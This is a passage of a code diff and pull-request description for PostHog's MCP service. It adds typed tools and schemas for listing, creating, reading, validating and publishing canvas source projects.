+        "summary": "Validate canvas source project",
+        "title": "Validate canvas source project",
+        "required_scopes": ["file_system:read"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": true,
+            "openWorldHint": true,
+            "readOnlyHint": true
+        }
+    },
+    "desktop-file-system-canvases-create": {
+        "description": "Create a new, empty canvas in a channel. Returns the canvas's id and (null) `current_version_id`; give it source by publishing a project with desktop-file-system-canvas-publish-create. Only create a canvas when no existing one is the intended target — list them with desktop-file-system-canvases-list first.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "Create canvas",
+        "title": "Create canvas",
+        "required_scopes": ["file_system:write"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": false,
+            "openWorldHint": true,
+            "readOnlyHint": false
+        }
+    },
+    "desktop-file-system-canvases-list": {
+        "description": "List the project's canvases (newest first, capped at 100), optionally scoped to one channel via `channel_id`. Use this to resolve which canvas a request refers to before reading or publishing source.",
+        "category": "Core",
+        "feature": "core",
+        "summary": "List canvases",
+        "title": "List canvases",
+        "required_scopes": ["file_system:read"],
+        "annotations": {
+            "destructiveHint": false,
+            "idempotentHint": true,
+            "openWorldHint": true,
+            "readOnlyHint": true
+        }
+    },
     "desktop-file-system-create": {
         "description": "Create a new channel (folder) on the desktop surface. Pass a slash-delimited `path` (parent folders are created automatically) and `type: folder`. A blank instruction set is created for the channel automatically; use the desktop-file-system-instructions-partial-update tool to fill it in.",
         "category": "Core",

--- a/services/mcp/src/api/generated.ts
+++ b/services/mcp/src/api/generated.ts
@@ -13482,10 +13482,10 @@ export namespace Schemas {
      * * `error` - error
      * * `warning` - warning
      */
-    export type UtmIssueSeverityEnum = typeof UtmIssueSeverityEnum[keyof typeof UtmIssueSeverityEnum];
+    export type DiagnosticSeverityEnum = typeof DiagnosticSeverityEnum[keyof typeof DiagnosticSeverityEnum];
 
 
-    export const UtmIssueSeverityEnum = {
+    export const DiagnosticSeverityEnum = {
       Error: 'error',
       Warning: 'warning',
     } as const;
@@ -13497,7 +13497,7 @@ export namespace Schemas {
        *
        * * `error` - error
        * * `warning` - warning */
-      severity: UtmIssueSeverityEnum;
+      severity: DiagnosticSeverityEnum;
       /** Human-readable description of the issue */
       message: string;
     }
@@ -13575,6 +13575,35 @@ export namespace Schemas {
     }
 
     /**
+     * Payload for creating a new, empty canvas in a channel.
+     */
+    export interface CanvasCreate {
+      /** Display name for the canvas. Slashes are replaced with spaces. */
+      name: string;
+      /** Desktop file-system id of the channel (folder) to create the canvas in. */
+      channel_id: string;
+    }
+
+    /**
+     * One structured validation/build diagnostic for a canvas source project.
+     */
+    export interface CanvasDiagnostic {
+      /** 'error' blocks publishing; 'warning' is advisory and does not block.
+       *
+       * * `error` - error
+       * * `warning` - warning */
+      severity: DiagnosticSeverityEnum;
+      /** Stable machine-readable diagnostic code, e.g. 'import_not_allowed' or 'unsupported_file'. */
+      code: string;
+      /** Human-readable description of the problem and how to fix it. */
+      message: string;
+      /** Project-relative path of the file the diagnostic points at, when file-specific. */
+      path?: string;
+      /** 1-based line number within `path`, when the diagnostic points at a specific line. */
+      line?: number;
+    }
+
+    /**
      * 409 body for a guarded canvas publish based on a stale version.
      */
     export interface CanvasPublishConflict {
@@ -13587,6 +13616,134 @@ export namespace Schemas {
          * @nullable
          */
       current_version_id: string | null;
+    }
+
+    /**
+     * 400 body for a publish whose source project failed validation.
+     */
+    export interface CanvasSourceInvalid {
+      /** Human-readable summary of why the project was rejected. */
+      detail: string;
+      /** Always "invalid_source_project". */
+      code: string;
+      /** The validation diagnostics, including at least one error. */
+      diagnostics: CanvasDiagnostic[];
+    }
+
+    /**
+     * Project files keyed by relative path (forward slashes, no '..'). Until the canvas build service ships, only "index.html" and "src/canvas.tsx" (the single React component the canvas mounts) are supported.
+     */
+    export type CanvasSourceProjectFiles = {[key: string]: string};
+
+    /**
+     * Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog/quill, recharts, lucide-react, dayjs) at their pinned versions.
+     */
+    export type CanvasSourceProjectDependencies = {[key: string]: string};
+
+    /**
+     * A canvas's multi-file source project — the canonical write format for canvas source.
+     *
+     * Until the canvas build service ships, projects are constrained to the
+     * legacy-compatible shape: `index.html` (a fixed synthetic shell) plus
+     * `src/canvas.tsx` (the single React component the runtime mounts).
+     */
+    export interface CanvasSourceProject {
+      /** Source-project schema version. Currently always 1. */
+      schemaVersion: number;
+      /** Project files keyed by relative path (forward slashes, no '..'). Until the canvas build service ships, only "index.html" and "src/canvas.tsx" (the single React component the canvas mounts) are supported. */
+      files: CanvasSourceProjectFiles;
+      /** The project's entry HTML file. Currently always "index.html". */
+      entryHtml: string;
+      /** Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog/quill, recharts, lucide-react, dayjs) at their pinned versions. */
+      dependencies?: CanvasSourceProjectDependencies;
+      /** Version of the host-injected `ph` canvas SDK the project targets. */
+      canvasSdkVersion?: string;
+    }
+
+    /**
+     * Payload for publishing a complete canvas source project.
+     */
+    export interface CanvasSourcePublish {
+      /** The complete source project to publish. */
+      project: CanvasSourceProject;
+      /** Short description of the change, stored on the appended version history entry. */
+      prompt?: string;
+      /** Optional new display name for the canvas (rewrites the leaf segment of its path). */
+      name?: string;
+      /**
+         * Optimistic-concurrency guard: the current_version_id the publisher based its edits on (null when it read a canvas with no versions yet). When the canvas has since moved past it the publish is rejected with a 409 version_conflict instead of overwriting the newer head. Omit to publish unguarded.
+         * @nullable
+         */
+      expected_current_version_id?: string | null;
+    }
+
+    /**
+     * Identity and version pointers for one canvas (a desktop 'dashboard' entry).
+     */
+    export interface CanvasSummary {
+      /** The canvas's desktop file-system id. */
+      id: string;
+      /** Display name of the canvas (the leaf segment of its path). */
+      name: string;
+      /**
+         * File-system id of the channel (folder) the canvas belongs to, when recorded.
+         * @nullable
+         */
+      channel_id: string | null;
+      /**
+         * Id of the live source version — pass as expected_current_version_id on publish. Null before the first publish.
+         * @nullable
+         */
+      current_version_id: string | null;
+      /** Number of source versions in the canvas's history. */
+      version_count: number;
+      /** When the canvas was created. */
+      created_at: string;
+    }
+
+    /**
+     * Result of a successful source-project publish.
+     */
+    export interface CanvasSourcePublishResponse {
+      /** The canvas after the publish, including the new version pointer. */
+      canvas: CanvasSummary;
+      /** Id of the source version this publish created. */
+      current_version_id: string;
+      /** Advisory (warning-severity) diagnostics recorded for the published project. */
+      diagnostics: CanvasDiagnostic[];
+    }
+
+    /**
+     * A canvas's source project plus the version pointer edits must be based on.
+     */
+    export interface CanvasSourceResponse {
+      /** Identity and version pointers for the canvas. */
+      canvas: CanvasSummary;
+      /** The canvas's source project. Legacy single-file canvases are presented as a synthetic project. */
+      project: CanvasSourceProject;
+      /**
+         * The live source version this project reflects — pass as expected_current_version_id when publishing an edit. Null before the first publish.
+         * @nullable
+         */
+      current_version_id: string | null;
+    }
+
+    /**
+     * Payload for validating a candidate source project without publishing it.
+     */
+    export interface CanvasValidateRequest {
+      /** The candidate source project to validate. */
+      project: CanvasSourceProject;
+    }
+
+    /**
+     * Validation outcome for a candidate source project.
+     */
+    export interface CanvasValidateResponse {
+      /** True when the project has no error-severity diagnostics. */
+      valid: boolean;
+      /** Structured diagnostics; errors block publishing, warnings are advisory. */
+      diagnostics: CanvasDiagnostic[];
     }
 
     /**
@@ -74087,6 +74244,17 @@ export namespace Schemas {
      * The initial index from which to return the results.
      */
     offset?: number;
+    /**
+     * A search term.
+     */
+    search?: string;
+    };
+
+    export type DesktopFileSystemCanvasesListParams = {
+    /**
+     * Only return canvases inside this channel (desktop folder id).
+     */
+    channel_id?: string;
     /**
      * A search term.
      */

--- a/services/mcp/src/generated/core/api.ts
+++ b/services/mcp/src/generated/core/api.ts
@@ -3,7 +3,7 @@
  * MCP service uses these Zod schemas for generated tool handlers.
  * To regenerate: hogli build:openapi
  *
- * PostHog API - MCP 10 enabled ops
+ * PostHog API - MCP 15 enabled ops
  * OpenAPI spec version: 1.0.0
  */
 import * as zod from 'zod'
@@ -748,6 +748,129 @@ export const DesktopFileSystemCanvasPartialUpdateBody = /* @__PURE__ */ zod
     .describe("Payload for publishing a freeform canvas's React source via the agent.")
 
 /**
+ * Publish a complete canvas source project as the canvas's new head version.
+ *
+ * Validates the project first — an error-severity diagnostic rejects the
+ * publish with 400 and leaves the canvas untouched. Guarded publishing via
+ * `expected_current_version_id` rejects a stale base with 409 instead of
+ * overwriting newer work.
+ */
+export const DesktopFileSystemCanvasPublishCreateParams = /* @__PURE__ */ zod.object({
+    id: zod.string().describe('A UUID string identifying this file system.'),
+    project_id: zod
+        .string()
+        .describe(
+            "Project ID of the project you're trying to access. To find the ID of the project, make a call to \/api\/projects\/."
+        ),
+})
+
+export const desktopFileSystemCanvasPublishCreateBodyProjectOneCanvasSdkVersionDefault = `0.1.0`
+
+export const DesktopFileSystemCanvasPublishCreateBody = /* @__PURE__ */ zod
+    .object({
+        project: zod
+            .object({
+                schemaVersion: zod.number().describe('Source-project schema version. Currently always 1.'),
+                files: zod
+                    .record(zod.string(), zod.string())
+                    .describe(
+                        'Project files keyed by relative path (forward slashes, no \'..\'). Until the canvas build service ships, only \"index.html\" and \"src\/canvas.tsx\" (the single React component the canvas mounts) are supported.'
+                    ),
+                entryHtml: zod.string().describe('The project\'s entry HTML file. Currently always \"index.html\".'),
+                dependencies: zod
+                    .record(zod.string(), zod.string())
+                    .optional()
+                    .describe(
+                        'Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog\/quill, recharts, lucide-react, dayjs) at their pinned versions.'
+                    ),
+                canvasSdkVersion: zod
+                    .string()
+                    .default(desktopFileSystemCanvasPublishCreateBodyProjectOneCanvasSdkVersionDefault)
+                    .describe('Version of the host-injected `ph` canvas SDK the project targets.'),
+            })
+            .describe(
+                "A canvas's multi-file source project — the canonical write format for canvas source.\n\nUntil the canvas build service ships, projects are constrained to the\nlegacy-compatible shape: `index.html` (a fixed synthetic shell) plus\n`src\/canvas.tsx` (the single React component the runtime mounts)."
+            )
+            .describe('The complete source project to publish.'),
+        prompt: zod
+            .string()
+            .optional()
+            .describe('Short description of the change, stored on the appended version history entry.'),
+        name: zod
+            .string()
+            .optional()
+            .describe('Optional new display name for the canvas (rewrites the leaf segment of its path).'),
+        expected_current_version_id: zod
+            .string()
+            .nullish()
+            .describe(
+                'Optimistic-concurrency guard: the current_version_id the publisher based its edits on (null when it read a canvas with no versions yet). When the canvas has since moved past it the publish is rejected with a 409 version_conflict instead of overwriting the newer head. Omit to publish unguarded.'
+            ),
+    })
+    .describe('Payload for publishing a complete canvas source project.')
+
+/**
+ * Read a canvas's source project and the version pointer edits must be based on.
+ *
+ * Legacy single-file canvases are presented as a synthetic web project whose
+ * `src/canvas.tsx` holds the stored React component.
+ */
+export const DesktopFileSystemCanvasSourceRetrieveParams = /* @__PURE__ */ zod.object({
+    id: zod.string().describe('A UUID string identifying this file system.'),
+    project_id: zod
+        .string()
+        .describe(
+            "Project ID of the project you're trying to access. To find the ID of the project, make a call to \/api\/projects\/."
+        ),
+})
+
+/**
+ * Validate a candidate source project without publishing it.
+ *
+ * Side-effect free: returns the same structured diagnostics a publish would
+ * enforce, so agents can iterate until the project is publishable.
+ */
+export const DesktopFileSystemCanvasValidateCreateParams = /* @__PURE__ */ zod.object({
+    id: zod.string().describe('A UUID string identifying this file system.'),
+    project_id: zod
+        .string()
+        .describe(
+            "Project ID of the project you're trying to access. To find the ID of the project, make a call to \/api\/projects\/."
+        ),
+})
+
+export const desktopFileSystemCanvasValidateCreateBodyProjectOneCanvasSdkVersionDefault = `0.1.0`
+
+export const DesktopFileSystemCanvasValidateCreateBody = /* @__PURE__ */ zod
+    .object({
+        project: zod
+            .object({
+                schemaVersion: zod.number().describe('Source-project schema version. Currently always 1.'),
+                files: zod
+                    .record(zod.string(), zod.string())
+                    .describe(
+                        'Project files keyed by relative path (forward slashes, no \'..\'). Until the canvas build service ships, only \"index.html\" and \"src\/canvas.tsx\" (the single React component the canvas mounts) are supported.'
+                    ),
+                entryHtml: zod.string().describe('The project\'s entry HTML file. Currently always \"index.html\".'),
+                dependencies: zod
+                    .record(zod.string(), zod.string())
+                    .optional()
+                    .describe(
+                        'Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog\/quill, recharts, lucide-react, dayjs) at their pinned versions.'
+                    ),
+                canvasSdkVersion: zod
+                    .string()
+                    .default(desktopFileSystemCanvasValidateCreateBodyProjectOneCanvasSdkVersionDefault)
+                    .describe('Version of the host-injected `ph` canvas SDK the project targets.'),
+            })
+            .describe(
+                "A canvas's multi-file source project — the canonical write format for canvas source.\n\nUntil the canvas build service ships, projects are constrained to the\nlegacy-compatible shape: `index.html` (a fixed synthetic shell) plus\n`src\/canvas.tsx` (the single React component the runtime mounts)."
+            )
+            .describe('The candidate source project to validate.'),
+    })
+    .describe('Payload for validating a candidate source project without publishing it.')
+
+/**
  * Return the latest non-deleted instructions for this folder.
  */
 export const DesktopFileSystemInstructionsRetrieveParams = /* @__PURE__ */ zod.object({
@@ -783,6 +906,42 @@ export const DesktopFileSystemInstructionsPartialUpdateBody = /* @__PURE__ */ zo
             "Latest version you are editing from, for optimistic concurrency. If provided and the folder's instructions have changed since, the request fails with 409. Use 0 when no instructions exist yet."
         ),
 })
+
+/**
+ * List the project's canvases, newest first (capped at 100).
+ */
+export const DesktopFileSystemCanvasesListParams = /* @__PURE__ */ zod.object({
+    project_id: zod
+        .string()
+        .describe(
+            "Project ID of the project you're trying to access. To find the ID of the project, make a call to \/api\/projects\/."
+        ),
+})
+
+export const DesktopFileSystemCanvasesListQueryParams = /* @__PURE__ */ zod.object({
+    channel_id: zod.string().optional().describe('Only return canvases inside this channel (desktop folder id).'),
+    search: zod.string().optional().describe('A search term.'),
+})
+
+/**
+ * Create a new, empty canvas in a channel.
+ *
+ * The canvas starts with no source; publish a source project to give it one.
+ */
+export const DesktopFileSystemCanvasesCreateParams = /* @__PURE__ */ zod.object({
+    project_id: zod
+        .string()
+        .describe(
+            "Project ID of the project you're trying to access. To find the ID of the project, make a call to \/api\/projects\/."
+        ),
+})
+
+export const DesktopFileSystemCanvasesCreateBody = /* @__PURE__ */ zod
+    .object({
+        name: zod.string().describe('Display name for the canvas. Slashes are replaced with spaces.'),
+        channel_id: zod.string().describe('Desktop file-system id of the channel (folder) to create the canvas in.'),
+    })
+    .describe('Payload for creating a new, empty canvas in a channel.')
 
 /**
  * Retrieve a user's profile and settings. Pass `@me` as the UUID to fetch the authenticated user; non-staff callers may only access their own account.

--- a/services/mcp/src/tools/generated/core.ts
+++ b/services/mcp/src/tools/generated/core.ts
@@ -5,6 +5,13 @@ import type { Schemas } from '@/api/generated'
 import {
     DesktopFileSystemCanvasPartialUpdateBody,
     DesktopFileSystemCanvasPartialUpdateParams,
+    DesktopFileSystemCanvasPublishCreateBody,
+    DesktopFileSystemCanvasPublishCreateParams,
+    DesktopFileSystemCanvasSourceRetrieveParams,
+    DesktopFileSystemCanvasValidateCreateBody,
+    DesktopFileSystemCanvasValidateCreateParams,
+    DesktopFileSystemCanvasesCreateBody,
+    DesktopFileSystemCanvasesListQueryParams,
     DesktopFileSystemCreateBody,
     DesktopFileSystemInstructionsPartialUpdateBody,
     DesktopFileSystemInstructionsPartialUpdateParams,
@@ -61,6 +68,147 @@ const desktopFileSystemCanvasPartialUpdate = (): ToolBase<
             method: 'PATCH',
             path: `/api/projects/${encodeURIComponent(String(projectId))}/desktop_file_system/${encodeURIComponent(String(params.id))}/canvas/`,
             body,
+        })
+        return result
+    },
+})
+
+const DesktopFileSystemCanvasPublishCreateSchema = DesktopFileSystemCanvasPublishCreateParams.omit({ project_id: true })
+    .extend(DesktopFileSystemCanvasPublishCreateBody.shape)
+    .extend({
+        id: DesktopFileSystemCanvasPublishCreateParams.shape['id'].describe(
+            'ID of the canvas whose source to publish.'
+        ),
+    })
+
+const desktopFileSystemCanvasPublishCreate = (): ToolBase<
+    typeof DesktopFileSystemCanvasPublishCreateSchema,
+    Schemas.CanvasSourcePublishResponse
+> => ({
+    name: 'desktop-file-system-canvas-publish-create',
+    schema: DesktopFileSystemCanvasPublishCreateSchema,
+    handler: async (context: Context, params: z.infer<typeof DesktopFileSystemCanvasPublishCreateSchema>) => {
+        const projectId = await context.stateManager.getProjectId()
+        const body: Record<string, unknown> = {}
+        if (params.project !== undefined) {
+            body['project'] = params.project
+        }
+        if (params.prompt !== undefined) {
+            body['prompt'] = params.prompt
+        }
+        if (params.name !== undefined) {
+            body['name'] = params.name
+        }
+        if (params.expected_current_version_id !== undefined) {
+            body['expected_current_version_id'] = params.expected_current_version_id
+        }
+        const result = await context.api.request<Schemas.CanvasSourcePublishResponse>({
+            method: 'POST',
+            path: `/api/projects/${encodeURIComponent(String(projectId))}/desktop_file_system/${encodeURIComponent(String(params.id))}/canvas/publish/`,
+            body,
+        })
+        return result
+    },
+})
+
+const DesktopFileSystemCanvasSourceRetrieveSchema = DesktopFileSystemCanvasSourceRetrieveParams.omit({
+    project_id: true,
+}).extend({
+    id: DesktopFileSystemCanvasSourceRetrieveParams.shape['id'].describe('ID of the canvas whose source to read.'),
+})
+
+const desktopFileSystemCanvasSourceRetrieve = (): ToolBase<
+    typeof DesktopFileSystemCanvasSourceRetrieveSchema,
+    Schemas.CanvasSourceResponse
+> => ({
+    name: 'desktop-file-system-canvas-source-retrieve',
+    schema: DesktopFileSystemCanvasSourceRetrieveSchema,
+    handler: async (context: Context, params: z.infer<typeof DesktopFileSystemCanvasSourceRetrieveSchema>) => {
+        const projectId = await context.stateManager.getProjectId()
+        const result = await context.api.request<Schemas.CanvasSourceResponse>({
+            method: 'GET',
+            path: `/api/projects/${encodeURIComponent(String(projectId))}/desktop_file_system/${encodeURIComponent(String(params.id))}/canvas/source/`,
+        })
+        return result
+    },
+})
+
+const DesktopFileSystemCanvasValidateCreateSchema = DesktopFileSystemCanvasValidateCreateParams.omit({
+    project_id: true,
+})
+    .extend(DesktopFileSystemCanvasValidateCreateBody.shape)
+    .extend({
+        id: DesktopFileSystemCanvasValidateCreateParams.shape['id'].describe('ID of the canvas the project is for.'),
+    })
+
+const desktopFileSystemCanvasValidateCreate = (): ToolBase<
+    typeof DesktopFileSystemCanvasValidateCreateSchema,
+    Schemas.CanvasValidateResponse
+> => ({
+    name: 'desktop-file-system-canvas-validate-create',
+    schema: DesktopFileSystemCanvasValidateCreateSchema,
+    handler: async (context: Context, params: z.infer<typeof DesktopFileSystemCanvasValidateCreateSchema>) => {
+        const projectId = await context.stateManager.getProjectId()
+        const body: Record<string, unknown> = {}
+        if (params.project !== undefined) {
+            body['project'] = params.project
+        }
+        const result = await context.api.request<Schemas.CanvasValidateResponse>({
+            method: 'POST',
+            path: `/api/projects/${encodeURIComponent(String(projectId))}/desktop_file_system/${encodeURIComponent(String(params.id))}/canvas/validate/`,
+            body,
+        })
+        return result
+    },
+})
+
+const DesktopFileSystemCanvasesCreateSchema = DesktopFileSystemCanvasesCreateBody.extend({
+    channel_id: DesktopFileSystemCanvasesCreateBody.shape['channel_id'].describe(
+        'Desktop file-system id of the channel (folder) to create the canvas in.'
+    ),
+})
+
+const desktopFileSystemCanvasesCreate = (): ToolBase<
+    typeof DesktopFileSystemCanvasesCreateSchema,
+    Schemas.CanvasSummary
+> => ({
+    name: 'desktop-file-system-canvases-create',
+    schema: DesktopFileSystemCanvasesCreateSchema,
+    handler: async (context: Context, params: z.infer<typeof DesktopFileSystemCanvasesCreateSchema>) => {
+        const projectId = await context.stateManager.getProjectId()
+        const body: Record<string, unknown> = {}
+        if (params.name !== undefined) {
+            body['name'] = params.name
+        }
+        if (params.channel_id !== undefined) {
+            body['channel_id'] = params.channel_id
+        }
+        const result = await context.api.request<Schemas.CanvasSummary>({
+            method: 'POST',
+            path: `/api/projects/${encodeURIComponent(String(projectId))}/desktop_file_system/canvases/`,
+            body,
+        })
+        return result
+    },
+})
+
+const DesktopFileSystemCanvasesListSchema = DesktopFileSystemCanvasesListQueryParams
+
+const desktopFileSystemCanvasesList = (): ToolBase<
+    typeof DesktopFileSystemCanvasesListSchema,
+    Schemas.CanvasSummary[]
+> => ({
+    name: 'desktop-file-system-canvases-list',
+    schema: DesktopFileSystemCanvasesListSchema,
+    handler: async (context: Context, params: z.infer<typeof DesktopFileSystemCanvasesListSchema>) => {
+        const projectId = await context.stateManager.getProjectId()
+        const result = await context.api.request<Schemas.CanvasSummary[]>({
+            method: 'GET',
+            path: `/api/projects/${encodeURIComponent(String(projectId))}/desktop_file_system/canvases/`,
+            query: {
+                channel_id: params.channel_id,
+                search: params.search,
+            },
         })
         return result
     },
@@ -597,6 +745,11 @@ const userSettingsUpdate = (): ToolBase<typeof UserSettingsUpdateSchema, Schemas
 
 export const GENERATED_TOOLS: Record<string, () => ToolBase<ZodObjectAny>> = {
     'desktop-file-system-canvas-partial-update': desktopFileSystemCanvasPartialUpdate,
+    'desktop-file-system-canvas-publish-create': desktopFileSystemCanvasPublishCreate,
+    'desktop-file-system-canvas-source-retrieve': desktopFileSystemCanvasSourceRetrieve,
+    'desktop-file-system-canvas-validate-create': desktopFileSystemCanvasValidateCreate,
+    'desktop-file-system-canvases-create': desktopFileSystemCanvasesCreate,
+    'desktop-file-system-canvases-list': desktopFileSystemCanvasesList,
     'desktop-file-system-create': desktopFileSystemCreate,
     'desktop-file-system-instructions-partial-update': desktopFileSystemInstructionsPartialUpdate,
     'desktop-file-system-instructions-retrieve': desktopFileSystemInstructionsRetrieve,

--- a/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvas-publish-create.json
+++ b/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvas-publish-create.json
@@ -1,0 +1,70 @@
+{
+    "$schema": "https://json-schema.org/draft/2020-12/schema",
+    "properties": {
+        "expected_current_version_id": {
+            "anyOf": [
+                {
+                    "type": "string"
+                },
+                {
+                    "type": "null"
+                }
+            ],
+            "description": "Optimistic-concurrency guard: the current_version_id the publisher based its edits on (null when it read a canvas with no versions yet). When the canvas has since moved past it the publish is rejected with a 409 version_conflict instead of overwriting the newer head. Omit to publish unguarded."
+        },
+        "id": {
+            "description": "ID of the canvas whose source to publish.",
+            "type": "string"
+        },
+        "name": {
+            "description": "Optional new display name for the canvas (rewrites the leaf segment of its path).",
+            "type": "string"
+        },
+        "project": {
+            "description": "The complete source project to publish.",
+            "properties": {
+                "canvasSdkVersion": {
+                    "default": "0.1.0",
+                    "description": "Version of the host-injected `ph` canvas SDK the project targets.",
+                    "type": "string"
+                },
+                "dependencies": {
+                    "additionalProperties": {
+                        "type": "string"
+                    },
+                    "description": "Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog/quill, recharts, lucide-react, dayjs) at their pinned versions.",
+                    "propertyNames": {
+                        "type": "string"
+                    },
+                    "type": "object"
+                },
+                "entryHtml": {
+                    "description": "The project's entry HTML file. Currently always \"index.html\".",
+                    "type": "string"
+                },
+                "files": {
+                    "additionalProperties": {
+                        "type": "string"
+                    },
+                    "description": "Project files keyed by relative path (forward slashes, no '..'). Until the canvas build service ships, only \"index.html\" and \"src/canvas.tsx\" (the single React component the canvas mounts) are supported.",
+                    "propertyNames": {
+                        "type": "string"
+                    },
+                    "type": "object"
+                },
+                "schemaVersion": {
+                    "description": "Source-project schema version. Currently always 1.",
+                    "type": "number"
+                }
+            },
+            "required": ["schemaVersion", "files", "entryHtml"],
+            "type": "object"
+        },
+        "prompt": {
+            "description": "Short description of the change, stored on the appended version history entry.",
+            "type": "string"
+        }
+    },
+    "required": ["id", "project"],
+    "type": "object"
+}

--- a/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvas-source-retrieve.json
+++ b/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvas-source-retrieve.json
@@ -1,0 +1,11 @@
+{
+    "$schema": "https://json-schema.org/draft/2020-12/schema",
+    "properties": {
+        "id": {
+            "description": "ID of the canvas whose source to read.",
+            "type": "string"
+        }
+    },
+    "required": ["id"],
+    "type": "object"
+}

--- a/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvas-validate-create.json
+++ b/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvas-validate-create.json
@@ -1,0 +1,51 @@
+{
+    "$schema": "https://json-schema.org/draft/2020-12/schema",
+    "properties": {
+        "id": {
+            "description": "ID of the canvas the project is for.",
+            "type": "string"
+        },
+        "project": {
+            "description": "The candidate source project to validate.",
+            "properties": {
+                "canvasSdkVersion": {
+                    "default": "0.1.0",
+                    "description": "Version of the host-injected `ph` canvas SDK the project targets.",
+                    "type": "string"
+                },
+                "dependencies": {
+                    "additionalProperties": {
+                        "type": "string"
+                    },
+                    "description": "Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog/quill, recharts, lucide-react, dayjs) at their pinned versions.",
+                    "propertyNames": {
+                        "type": "string"
+                    },
+                    "type": "object"
+                },
+                "entryHtml": {
+                    "description": "The project's entry HTML file. Currently always \"index.html\".",
+                    "type": "string"
+                },
+                "files": {
+                    "additionalProperties": {
+                        "type": "string"
+                    },
+                    "description": "Project files keyed by relative path (forward slashes, no '..'). Until the canvas build service ships, only \"index.html\" and \"src/canvas.tsx\" (the single React component the canvas mounts) are supported.",
+                    "propertyNames": {
+                        "type": "string"
+                    },
+                    "type": "object"
+                },
+                "schemaVersion": {
+                    "description": "Source-project schema version. Currently always 1.",
+                    "type": "number"
+                }
+            },
+            "required": ["schemaVersion", "files", "entryHtml"],
+            "type": "object"
+        }
+    },
+    "required": ["id", "project"],
+    "type": "object"
+}

--- a/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvases-create.json
+++ b/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvases-create.json
@@ -1,0 +1,15 @@
+{
+    "$schema": "https://json-schema.org/draft/2020-12/schema",
+    "properties": {
+        "channel_id": {
+            "description": "Desktop file-system id of the channel (folder) to create the canvas in.",
+            "type": "string"
+        },
+        "name": {
+            "description": "Display name for the canvas. Slashes are replaced with spaces.",
+            "type": "string"
+        }
+    },
+    "required": ["name", "channel_id"],
+    "type": "object"
+}

--- a/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvases-list.json
+++ b/services/mcp/tests/unit/__snapshots__/tool-schemas/desktop-file-system-canvases-list.json
@@ -1,0 +1,14 @@
+{
+    "$schema": "https://json-schema.org/draft/2020-12/schema",
+    "properties": {
+        "channel_id": {
+            "description": "Only return canvases inside this channel (desktop folder id).",
+            "type": "string"
+        },
+        "search": {
+            "description": "A search term.",
+            "type": "string"
+        }
+    },
+    "type": "object"
+}


### PR DESCRIPTION
> [!NOTE]
> **Stacked PR chain (Graphite-style) — merge in this order:**
> - `posthog/posthog`: [#73725](https://github.com/PostHog/posthog/pull/73725) (phase 1) → [#73730](https://github.com/PostHog/posthog/pull/73730) (phase 3) → [#73731](https://github.com/PostHog/posthog/pull/73731) (phase 4)
> - `PostHog/code`: [#3824](https://github.com/PostHog/code/pull/3824) (phase 1) → [#3825](https://github.com/PostHog/code/pull/3825) (phase 2) → [#3826](https://github.com/PostHog/code/pull/3826) (phase 3) → [#3827](https://github.com/PostHog/code/pull/3827) (phase 4)
> - Cross-repo: each posthog PR should deploy before the same-phase code PR ships (skills/tools/endpoints must exist before clients rely on them).

## Problem

Canvas authoring today rides on a single tool (`desktop-file-system-canvas-partial-update`) driven by a large prompt the canvas composer embeds per generation. That locks canvas creation to the composer, gives agents no way to read or validate what they're editing, and validation happens only at runtime in the sandbox.

This implements phase 1 ("Contracts and skills") of the canvas application build pipeline plan ([PostHog/code#3823](https://github.com/PostHog/code/pull/3823)): typed read/create/validate/publish canvas tools available to every task, the authoring contract extracted into bundled skills, and the existing single-file publish kept underneath a compatibility adapter so this ships before the build service.

## Changes

**API** (`posthog/api/file_system/`) — new actions on `DesktopFileSystemViewSet`:

- `GET/POST /desktop_file_system/canvases/` — list canvases (optionally per channel) and create an empty canvas in a channel.
- `GET .../{id}/canvas/source/` — the canvas's source project plus `current_version_id`. Legacy `meta.code` canvases are presented as a synthetic web project (`index.html` + `src/canvas.tsx`).
- `POST .../{id}/canvas/validate/` — side-effect-free validation with structured diagnostics (severity, stable code, message, file, line): schema/paths/size limits, platform-pinned dependency checks, and the legacy runtime's import allowlist.
- `POST .../{id}/canvas/publish/` — publish a complete source project as the new head version, guarded by `expected_current_version_id` (409 `version_conflict` on a stale base; error diagnostics reject with 400 and leave the canvas untouched). Reduces to the same `meta.code` + version-history storage as the legacy PATCH endpoint (shared transactional core), so the composer path, undo/redo, and task-thread announcements behave identically.

The adapter/validation logic is pure and lives in `posthog/api/file_system/canvas_source.py`. No models or migrations — storage stays in `FileSystem.meta` until the build service ships.

**MCP** (`services/mcp/definitions/core.yaml` + regenerated tools/schemas) — five new enabled `desktop-file-system-canvas*` tools so any authorized task can resolve, read, validate, and publish canvases.

**Skills** (`products/tasks/skills/`) — the canvas authoring contract, previously an embedded mega-prompt in the desktop app, extracted into five bundled skills shipped through the existing skills distribution: `building-canvases` (routing + workflow), `building-react-quill-canvases` (+ starter scaffold reference), `building-html-canvases`, `querying-canvas-data`, `validating-and-publishing-canvases`.

Companion PR [PostHog/code#3824](https://github.com/PostHog/code/pull/3824) moves generation orchestration into core and swaps the composer prompt to skill routing. **This PR should merge and deploy first** (skills reach sandbox images, tools reach MCP) — the legacy tool and prompt keep working throughout.

## How did you test this code?

Ran locally (I'm an agent; no manual app testing):

